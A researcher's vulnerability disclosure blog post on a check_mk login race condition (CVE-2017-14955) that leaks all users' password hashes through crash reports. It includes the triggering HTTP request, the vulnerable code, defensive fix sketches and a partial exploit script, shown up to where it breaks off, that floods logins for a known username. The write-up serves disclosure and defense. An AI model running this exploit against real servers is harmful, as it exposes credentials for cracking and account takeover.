The authors of check_mk have fixed a quite interesting vulnerability that I recently reported to them. It is tracked as CVE-2017-14955 (sorry, no fancy name here) and affects the oldstable version 1.2.8p25 and below of both check_mk and check_mk Enterprise. It is a race condition in the login functionality that ultimately discloses authentication credentials to an unauthenticated user. Sounds like a bit of fun, doesn’t it? Let’s dig into it 😉

How to win a race

You might have seen this login interface before:

While brute-forcing the check_mk authentication with multiple concurrent threads, I used the following request:

POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1

-----9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"

login
-----9519178121294961341040589727
Content-Disposition: form-data; name="_login"

1
-----9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"

index.py
-----9519178121294961341040589727
Content-Disposition: form-data; name="_username"

omdadmin
-----9519178121294961341040589727
Content-Disposition: form-data; name="_password"

welcome
-----9519178121294961341040589727
Content-Disposition: form-data; name="_login"

Login
-----9519178121294961341040589727--

A really interesting “No such file or directory” exception is thrown at random and not at all reliably. It looks like the following:

 <td class="left">Exception</td><td><pre>OSError ([Errno 2] No such file or directory)</pre></td></tr><tr class="data even0"><td class="left">Traceback</td><td><pre>  File &quot;/check_mk/web/htdocs/index.py&quot;, line 95, in handler
    login.page_login(plain_error())

  File &quot;/check_mk/web/htdocs/login.py&quot;, line 261, in page_login
    result = do_login()

  File &quot;/check_mk/web/htdocs/login.py&quot;, line 254, in do_login
    userdb.on_failed_login(username)

  File &quot;/check_mk/web/htdocs/userdb.py&quot;, line 273, in on_failed_login
    save_users(users)

  File &quot;/check_mk/web/htdocs/userdb.py&quot;, line 582, in save_users
    os.rename(filename, filename[:-4])
</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
                              'contactgroups': ['all'],
                              'disable_notifications': False,
                              'email': u'[email protected]',
                              'enforce_pw_change': False,
                              'last_pw_change': 0,
                              'last_seen': 0.0,
                              'locked': False,
                              'num_failed': 0,
                              'pager': '',
                              'password': '$1$400000$13371337asdfasdf',
                              'roles': ['admin'],
                              'serial': 2},
[...]

I guess you find this as interesting as I did, because this Python exception basically contains a copy of all configured users, including their email addresses, roles, and even their password hashes.

Triaging

Sometimes I’m really curious about the root cause of a vulnerability, and this is one of those cases. What makes it so interesting is that it can be triggered by knowing just one valid username, which is usually “omdadmin”.

So as soon as a login fails, the function “on_failed_login()” from /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py is triggered (lines 261-273):

def on_failed_login(username):
    users = load_users(lock = True)
    if username in users:
        if "num_failed" in users[username]:
            users[username]["num_failed"] += 1
        else:
            users[username]["num_failed"] = 1

        if config.lock_on_logon_failures:
            if users[username]["num_failed"] >= config.lock_on_logon_failures:
                users[username]["locked"] = True

        save_users(users)

This function stores the number of failed login attempts for a valid user and then calls another function named “save_users()”, passing the complete users dictionary (not just the counter) as its argument. Tracing further through save_users(), you’ll finally come across the vulnerable code (lines 575-582):

    
    # Users with passwords for Multisite
    filename = multisite_dir + "users.mk.new"
    make_nagios_directory(multisite_dir)
    out = create_user_file(filename, "w")
    out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
    out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
    out.close()
    os.rename(filename, filename[:-4])

But the vulnerability isn’t exactly obvious, right? Well, it’s a race condition. If you’re not familiar with race conditions, just imagine the following situation applied to that code snippet:

  1. When brute-forcing, you usually use multiple concurrent threads, because otherwise it would take too long.
  2. All of these requests run through the same code path on the server, which means they call the save_users() function at nearly the same time, depending a bit on the connection delay between the client and the server.
  3. For simplicity, let’s imagine that two of these threads are only a tenth of a millisecond apart, so the second one is “delayed” by just one instruction (in terms of the snippet shown above).
  4. The first thread sets the “users.mk.new” filename (line 2), creates and writes the file, and reaches the os.rename call (line 8), but has not yet executed it.
  5. The second thread does the very same with the mentioned small delay: it executes everything up to and including line 7, which means it has just closed the “users.mk.new” file and is now about to call os.rename as well.
  6. Since the first thread is slightly ahead, it is the first to execute the os.rename call and thereby renames “users.mk.new” to “users.mk”.
  7. The second thread now tries to do the very same thing. However, “users.mk.new” no longer exists because the first thread has just renamed it, so the second thread’s os.rename call has nothing left to rename.
  8. Since there is no exception handling around these instructions, the second thread’s os.rename raises an OSError, and the resulting crash report contains the stack trace from above, leaking all the credential details.
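
The interleaving in steps 4 to 7 can be replayed deterministically, without any threads, by performing the file operations of both requests by hand in the losing order. The following is a minimal Python 3 sketch under that assumption: `write_new` and `replay_race` are hypothetical helper names, and a temporary directory stands in for check_mk’s `multisite_dir`. It is not check_mk code, only an illustration of the sequence.

```python
import errno
import os
import tempfile


def write_new(path, payload):
    # Mirrors the create/write/close part of save_users(): every caller
    # uses the same fixed temporary file name.
    with open(path, "w") as out:
        out.write(payload)


def replay_race(directory):
    """Replay steps 4-7 in a fixed order; return the loser's errno (or None)."""
    new_path = os.path.join(directory, "users.mk.new")
    final_path = new_path[:-4]  # "users.mk", same slicing as the original code

    write_new(new_path, "request A\n")   # request A: write + close
    write_new(new_path, "request B\n")   # request B: write + close (same file)
    os.rename(new_path, final_path)      # request A renames first
    try:
        os.rename(new_path, final_path)  # request B: the source is gone
    except OSError as exc:
        return exc.errno
    return None
```

Calling `replay_race(tempfile.mkdtemp())` should return `errno.ENOENT`, which is the “[Errno 2] No such file or directory” seen in the crash report.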

A few more things that come into play here:

First: the create_user_file() function doesn’t really play an important role here, since its sole purpose is to create a new file object. If the file passed to it via its “path” argument already exists in the file system, it will not throw an exception at all.

def create_user_file(path, mode):
    path = make_utf8(path)
    f = file(path, mode, 0)
    gid = grp.getgrnam(defaults.www_group).gr_gid
    # Tackle user problem: If the file is owned by nagios, the web
    # user can write it but cannot chown the group. In that case we
    # assume that the group is correct and ignore the error
    try:
        os.chown(path, -1, gid)
        os.chmod(path, 0660)
    except:
        pass
    return f
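
To illustrate why the second writer goes unnoticed at this point, here is a small Python 3 sketch comparing mode "w" (as used above) with exclusive creation. The helper names are hypothetical and a temporary directory stands in for the real path; this only demonstrates the difference in behaviour and is not meant as the vendor’s fix.

```python
import os
import tempfile


def open_like_original(path):
    # Mode "w" creates the file or silently truncates an existing one.
    return open(path, "w")


def open_exclusive(path):
    # Mode "x" (Python 3) creates the file exclusively and raises
    # FileExistsError if it is already there.
    return open(path, "x")


def demo(directory):
    path = os.path.join(directory, "users.mk.new")
    open_like_original(path).close()   # first writer creates the file
    open_like_original(path).close()   # second writer: no error, file truncated
    try:
        open_exclusive(path).close()   # exclusive creation notices the clash
    except FileExistsError:
        return "exclusive open refused"
    return "no conflict detected"
```

With mode "w", two writers can therefore share “users.mk.new” without either of them noticing, and the conflict only surfaces later at os.rename.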

Second: more interestingly, the application ships with its own crash reporting system (see packages/check_mk/check_mk-1.2.8p25/web/htdocs/crash_reporting.py), which prints out all local variables, including these very sensitive ones:

def show_crash_report(info):
    html.write("<h2>%s</h2>" % _("Crash Report"))
    html.write("<table class=\"data\">")
    html.write("<tr class=\"data even0\"><td class=\"left legend\">%s</td>" % _("Crash Type"))
    html.write("<td>%s</td></tr>" % html.attrencode(info["crash_type"]))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Time"))
    html.write("<td>%s</td></tr>" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(info["time"])))
    html.write("<tr class=\"data even0\"><td class=\"left\">%s</td>" % _("Operating System"))
    html.write("<td>%s</td></tr>" % html.attrencode(info["os"]))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Check_MK Version"))
    html.write("<td>%s</td></tr>" % html.attrencode(info["version"]))
    html.write("<tr class=\"data even0\"><td class=\"left\">%s</td>" % _("Python Version"))
    html.write("<td>%s</td></tr>" % html.attrencode(info.get("python_version", _("Unknown"))))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Exception"))
    html.write("<td><pre>%s (%s)</pre></td></tr>" % (html.attrencode(info["exc_type"]),
                                                     html.attrencode(info["exc_value"])))
    html.write("<tr class=\"data even0\"><td class=\"left\">%s</td>" % _("Traceback"))
    html.write("<td><pre>%s</pre></td></tr>" % html.attrencode(format_traceback(info["exc_traceback"])))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Local Variables"))
    html.write("<td><pre>%s</pre></td></tr>" % html.attrencode(format_local_vars(info["local_vars"])))
    html.write("</table>")
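
Why does the users dictionary end up in the report at all? A crash reporter that dumps the local variables of the failing frame sees everything that frame holds, and in save_users() that includes `users`. The Python 3 sketch below shows the mechanism with the standard traceback objects, plus one possible way to mask sensitive keys before rendering. All names here (`SENSITIVE_KEYS`, `innermost_locals`, `redact`, `save_users_stub`, `crash_locals`) are hypothetical and not taken from check_mk, and the redaction is only an assumption about how such a leak could be reduced.

```python
import sys

SENSITIVE_KEYS = {"password", "secret"}  # hypothetical deny-list


def innermost_locals(tb):
    # Walk to the frame where the exception was raised and copy its locals.
    while tb.tb_next is not None:
        tb = tb.tb_next
    return dict(tb.tb_frame.f_locals)


def redact(value):
    # Recursively replace values stored under sensitive keys.
    if isinstance(value, dict):
        return {
            key: "<redacted>" if key in SENSITIVE_KEYS else redact(item)
            for key, item in value.items()
        }
    if isinstance(value, (list, tuple)):
        return type(value)(redact(item) for item in value)
    return value


def save_users_stub(users):
    # Stand-in for save_users(): fails while `users` is a local variable.
    raise OSError(2, "No such file or directory")


def crash_locals(users):
    # Stand-in for the crash handler: grab the locals of the failing frame.
    try:
        save_users_stub(users)
    except OSError:
        return innermost_locals(sys.exc_info()[2])
```

Passing the result of `crash_locals(...)` through `redact(...)` before formatting it would keep the structure of the report while hiding the hashes.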

Third: there is another vulnerable instruction set right before the first one in /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py (lines 567 to 573), with exactly the same issue:

    # Check_MK's monitoring contacts
    filename = root_dir + "contacts.mk.new"
    out = create_user_file(filename, "w")
    out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
    out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
    out.close()
    os.rename(filename, filename[:-4])
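
Both write paths share the same pattern: a fixed “.new” file name followed by os.rename. One common way to avoid this class of race is to give every writer its own uniquely named temporary file in the same directory and only then rename it over the target. The Python 3 sketch below shows that idea; `atomic_write` and `hammer` are hypothetical names, and I am not claiming this is how the vendor fixed it.

```python
import os
import tempfile
import threading


def atomic_write(final_path, payload):
    directory = os.path.dirname(final_path) or "."
    prefix = os.path.basename(final_path) + "."
    # mkstemp() creates a uniquely named file, so no two writers share it.
    fd, tmp_path = tempfile.mkstemp(dir=directory, prefix=prefix)
    try:
        with os.fdopen(fd, "w") as out:
            out.write(payload)
        # os.replace() overwrites the target; on POSIX this is atomic when
        # both paths live on the same filesystem.
        os.replace(tmp_path, final_path)
    except Exception:
        if os.path.exists(tmp_path):
            os.unlink(tmp_path)
        raise


def hammer(final_path, writers=8):
    # Run several concurrent writers and collect any OSError they hit.
    errors = []

    def worker(n):
        try:
            atomic_write(final_path, "writer %d\n" % n)
        except OSError as exc:
            errors.append(exc)

    threads = [threading.Thread(target=worker, args=(n,)) for n in range(writers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return errors
```

Note that this only removes the failing rename. The last writer still wins, so a read-modify-write cycle such as incrementing num_failed would additionally need to be serialized, for example with a lock held across load and save.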

About the Vendor Response

Just one word: amazing! I reported this vulnerability on 2017-09-21, which was a Thursday, and they had already pushed a fix to their git repository by 2017-09-25, publishing the new version 1.2.8p26 with the official fix at the same time. Really commendable work, check_mk team!

Exploit time!

An exploit script will be published on Exploit-DB soon. In the meantime, take it from here:

#!/usr/bin/python
# Exploit Title: Check_mk <= v1.2.8p25 save_users() Race Condition
# Version:       <= 1.2.8p25
# Date:          2017-10-18
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on:     1.2.8p25
# CVE:           CVE-2017-14955
#
# Howto / Notes:
# This script exploits the race condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955. You only need a valid username to
# dump all password hashes. Make sure to set up a local proxy to
# catch the dump. Happy brute forcing ;-)

import requests
import threading

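try:
    # Silence the certificate warnings caused by verify=False below.
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except (ImportError, AttributeError):
    # Older requests versions may not bundle urllib3 this way; carry on.
    pass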

# Config Me
target_url = "https://localhost/check_mk/login.py"
target_username = "omdadmin"

proxies = {
  'http': 'http://127.0.0.1:8080',
  'https': 'http://127.0.0.1:8080',
}

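def make_session():
    # A list of tuples is used instead of a dict because "_login" is sent
    # twice in the original request; a dict would keep only the last value.
    fields = [
        ('filled_in', (None, 'login')),
        ('_login', (None, '1')),
        ('_origtarget', (None, 'index.py')),
        ('_username', (None, target_username)),
        ('_password', (None, 'random')),
        ('_login', (None, 'Login')),
    ]
    v = requests.post(target_url, verify=False, proxies=proxies, files=fields)
    return v.content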

NUM = 50